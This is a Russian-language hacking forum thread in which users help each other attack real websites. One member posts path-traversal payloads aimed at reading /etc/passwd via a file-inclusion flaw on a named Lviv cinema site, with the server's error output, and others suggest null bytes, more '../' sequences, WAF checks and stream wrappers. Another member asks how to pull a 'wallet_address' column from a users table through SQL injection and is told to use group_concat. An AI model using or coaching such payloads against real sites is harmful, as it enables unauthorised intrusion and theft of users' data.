20.03.2015, 22:54
|
|
Познающий
Регистрация: 02.12.2010
Сообщений: 79
С нами:
8128406
Репутация:
-2
|
|
Сообщение от BigBear
incorrect_path/../../etc/passwd%00
это нужно подставить?
когда подставляю получаю
Warning: include(): Failed opening '../kinonetwork/incorrect_path/../../etc/passwd' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/kinopal/main/tmpl/network.php on line 6
|
|
|
20.03.2015, 23:07
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Ты уже рядом. Надо больше ../
Ищи, пробуй.
|
|
|
|
20.03.2015, 23:39
|
|
Познающий
Регистрация: 02.12.2010
Сообщений: 79
С нами:
8128406
Репутация:
-2
|
|
Сообщение от BigBear
Ты уже рядом. Надо больше ../
Ищи, пробуй.
дошел до 20 и думаю, дальше ничего не будет. Значить, уже ничего не сделаешь?
|
|
|
|
20.03.2015, 23:46
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от teh
дошел до 20 и думаю, дальше ничего не будет. Значить, уже ничего не сделаешь?
Разложи карты ТАРО, они подскажут тебе верное направление или внимательней перечитай мануалы, может повезет, поймешь более правильный вектор, каждый случай индивидуальный и требует индивидуального рассмотрение на примере...
|
|
|
|
21.03.2015, 03:05
|
|
Познающий
Регистрация: 02.12.2010
Сообщений: 79
С нами:
8128406
Репутация:
-2
|
|
Помогите, пожалуйста немогу найти инклуд
kinopalace.lviv.ua/kinonetwork/?id=../
|
|
|
|
21.03.2015, 11:40
|
|
Участник форума
Регистрация: 27.03.2014
Сообщений: 129
С нами:
6384566
Репутация:
1
|
|
что за н... при SELECT любой столбец FROM users LIMIT 1,1 всё нормально ,кроме SELECT wallet_address FROM users LIMIT 1,1 Subquery returns more than 1 row
|
|
|
|
21.03.2015, 11:50
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от madam
что за н... при SELECT любой столбец FROM users LIMIT 1,1 всё нормально ,кроме SELECT wallet_address FROM users LIMIT 1,1 Subquery returns more than 1 row
через group_concat выводите
|
|
|
|
21.03.2015, 12:04
|
|
Участник форума
Регистрация: 27.03.2014
Сообщений: 129
С нами:
6384566
Репутация:
1
|
|
Сообщение от faza02
через group_concat выводите
спасибо
|
|
|
|
21.03.2015, 12:36
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от teh
Здраствуйте. Нашел ошибку file inclusion. Но когда питаюсь подключить сайти или вывести файл etc/passwd получаю
Warning: include(../kinonetwork/../../../../../../../../../../etc/passwd.html): failed to open stream: No such file or directory in /home/kinopal/main/tmpl/network.php on line 6
Warning: include(../kinonetwork/../../../../../../../../../../etc/passwd.html): failed to open stream: No such file or directory in /home/kinopal/main/tmpl/network.php on line 6
Warning: include(): Failed opening '../kinonetwork/../../../../../../../../../../etc/passwd.html' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/kinopal/main/tmpl/network.php on line 6
подставляю %00 и получаю
Warning: include(): Failed opening '../kinonetwork/../../../../../../../../../../etc/passwd' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/kinopal/main/tmpl/network.php on line 6
можно что нибудь сделать или уже ничего не вытащить?
На подставление нулл-байта и изменении количества ../ поиск не ограничивается. Проанализируйте, есть ли есть waf на сайте, какие настройки и версия php используется( возможно ли использовании include в конструкции if, нормализация, усечение пути, стрим врапперы etc).
По Вашим постам заметно, что используете самое малое количество методов, не пытаетесь разобраться во многом.
Манов на форуме достаточно!
|
|
|
|
21.03.2015, 19:50
|
|
Познающий
Регистрация: 02.12.2010
Сообщений: 79
С нами:
8128406
Репутация:
-2
|
|
Сообщение от YaBtr
На подставление нулл-байта и изменении количества ../ поиск не ограничивается. Проанализируйте, есть ли есть waf на сайте, какие настройки и версия php используется( возможно ли использовании include в конструкции if, нормализация, усечение пути, стрим врапперы etc).
По Вашим постам заметно, что используете самое малое количество методов, не пытаетесь разобраться во многом.
Манов на форуме достаточно!
спасибо, буду разбираться, простите за наверно глупые вопросы
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
